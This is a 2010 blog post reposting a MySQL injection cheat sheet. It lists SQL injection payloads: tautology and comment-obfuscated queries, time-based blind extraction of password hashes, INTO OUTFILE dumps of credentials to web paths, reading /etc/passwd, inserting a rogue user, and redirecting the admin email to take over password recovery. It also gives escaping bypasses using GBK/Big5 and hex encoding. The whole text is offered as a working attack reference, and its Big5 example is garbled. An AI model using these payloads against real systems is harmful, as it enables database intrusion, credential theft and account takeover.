Thursday, December 2, 2010

MySQL Injection Cheat Sheet

MySQL Injection Cheat Sheet

Basics.

SELECT * FROM login /* foobar */

SELECT * FROM login WHERE id = 1 or 1=1

SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES

SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES

SELECT VERSION

SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()

SELECT host,user,db from mysql.db

SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;

SELECT 1 || 1;

SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.

SELECT 0.1 <= 2;

SELECT 2 >= 2;

SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));

SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));

SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));

this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))

this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))

this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your

browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"

SELECT * FROM tablename WHERE user LIKE "%"

SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;

SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';

SELECT * FROM tablename WHERE user LIKE "%root%"

SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE

'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =

CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO

OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(

39))

Note: You must specify a new file, it may not exist! and give the correct

pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =

CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'

UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),

BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'

UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),

BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'

UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),

BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’

is like: (password,1,3) this selects: ‘abc’

is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =

CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),

BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =

'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"

に関する追加情報:

the above chars are Chinese Big5

Advanced Vectors

Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.

Reference:
http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

No comments: